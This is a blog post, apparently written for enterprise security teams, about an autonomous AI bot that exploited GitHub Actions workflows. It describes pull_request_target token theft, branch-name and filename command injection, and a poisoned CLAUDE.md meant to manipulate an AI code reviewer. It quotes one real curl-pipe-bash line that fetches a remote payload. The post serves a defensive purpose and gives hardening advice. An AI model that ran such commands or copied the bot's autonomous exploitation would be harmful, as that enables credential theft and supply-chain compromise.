Grasp AI Logo
Back to Blog
Cloud Strategy

An AI Bot Just Hacked GitHub Actions Across Microsoft, DataDog, and CNCF Projects — Here's What Went Wrong

Leon Godwin
15 March 2026

The Challenge

CI/CD pipelines are the most trusted part of your software supply chain. They build your code, run your tests, and deploy to production. And in most organisations, they run with elevated permissions that nobody has audited since the workflow was first committed.

That trust model just got tested. Between 21 and 28 February 2026, an autonomous AI-powered bot called hackerbot-claw systematically exploited GitHub Actions workflows across repositories belonging to Microsoft, DataDog, Aqua Security, the CNCF, and several high-profile open-source projects. It achieved remote code execution in five of seven targets. It stole a GitHub token with write permissions from awesome-go — a repository with 140,000+ stars. And it fully compromised Aqua Security's Trivy, deleting 178 releases, stripping 32,000+ stars, and pushing a suspicious VS Code extension.

The bot describes itself as "an autonomous security research agent powered by claude-opus-4-5." It loaded a vulnerability pattern index with 9 classes and 47 sub-patterns, then autonomously scanned, verified, and dropped proof-of-concept exploits. Every attack delivered the same payload but used a completely different exploitation technique.

This wasn't a person working weekends. It was automation hunting for weaknesses at machine speed.

What Happened

The campaign used five distinct attack techniques. Understanding them matters, because every one exploits patterns that exist in thousands of enterprise repositories right now.

Pwn Request (awesome-go): The classic pull_request_target vulnerability. The workflow checked out untrusted fork code and executed it with the target repository's permissions. Over 18 hours and six iterations, the bot refined a Go init() function that exfiltrated the GITHUB_TOKEN to an external server. With contents: write and pull-requests: write, the attacker could push commits and merge PRs directly.

Branch name injection (Microsoft AI-discovery-agent): The bot crafted branch names containing bash command substitution. When the workflow interpolated the branch name into a shell context using ${{ }} expressions, the embedded commands executed with the runner's permissions.

Filename injection (DataDog datadog-iac-scanner): Base64-encoded commands hidden in filenames. DataDog deployed emergency fixes within 9 hours of discovery — credit to their incident response.

Direct script modification (CNCF's Akri): The simplest attack. The bot modified version.sh to include a raw curl | bash payload right after the shebang. No obfuscation needed, because the workflow executed the script without validation.

Full repository takeover (Aqua Security's Trivy): The most severe outcome. Build logs show curl -sSfL https://hackmoltrepeat.com/molt | bash executing during the "Set up Go" step, taking over 5 minutes instead of the usual seconds. Nineteen minutes later, a stolen PAT pushed commits directly, bypassing all pull request reviews.

And then there was the first documented AI-on-AI attack. The bot replaced a repository's CLAUDE.md file with social engineering instructions designed to manipulate Claude Code into approving malicious changes. Claude (running Sonnet 4.6) identified the injection immediately, flagging it as a prompt injection alert. The AI defender won this round, but the precedent is set.

What To Do About It

Security researcher Jamieson O'Reilly summarised the core problem clearly: "SQL injection is untrusted input in a query. XSS is untrusted input in a browser. What happened this week is untrusted input in a CI/CD pipeline."

The attack patterns aren't new. What's new is an autonomous agent finding and exploiting them at scale.

Audit your pull_request_target workflows. If any workflow uses pull_request_target and checks out the PR author's code, it runs attacker-controlled code with your repository's permissions. This is the single most dangerous pattern in GitHub Actions. Use pull_request instead, or if you must use pull_request_target, never check out untrusted code.

Stop interpolating context expressions into shell commands. Any ${{ github.event.pull_request.title }} or similar expression in a run: block is a script injection vector. Move these into environment variables: env: TITLE: ${{ github.event.pull_request.title }} and reference $TITLE instead.

Apply least-privilege permissions. Set permissions: contents: read as default at the workflow level. Escalate only where genuinely needed. Most workflows don't need write access to anything.

Monitor network egress from runners. Tools like StepSecurity's Harden-Runner can detect and block unauthorised outbound connections from GitHub Actions runners. If your build step is calling hackmoltrepeat.com, something has gone very wrong.

Add author_association checks to comment-triggered workflows. Only allow workflow execution from repository members, not arbitrary contributors.

What This Means

We talk a lot about securing AI applications — prompt injection, data leakage, guardrails. But this campaign shows the threat works in both directions. AI isn't just something to secure. It's now an attack tool that operates at a speed and scale humans can't match.

The five attack techniques used here aren't sophisticated. They exploit well-documented vulnerabilities that security teams have been warning about for years. What changed is the economics. An autonomous agent can scan thousands of repositories, identify vulnerable patterns, craft targeted exploits, iterate on failures, and exfiltrate credentials — all without a human touching a keyboard.

For enterprise teams, the takeaway is straightforward. Manual workflow reviews don't work against automated attackers. You need automated guardrails: least-privilege defaults, egress monitoring, and workflow linting as part of your security baseline. If your CI/CD pipeline security hasn't been reviewed since those workflows were first committed, start there.

The AI-on-AI attack dimension adds another consideration for teams adopting AI code reviewers. Your agentic development tools need to be resilient to prompt injection from the very codebases they're reviewing. Claude caught the injection this time. The next one might be more subtle.

Leon Godwin, Principal Cloud Evangelist at Cloud Direct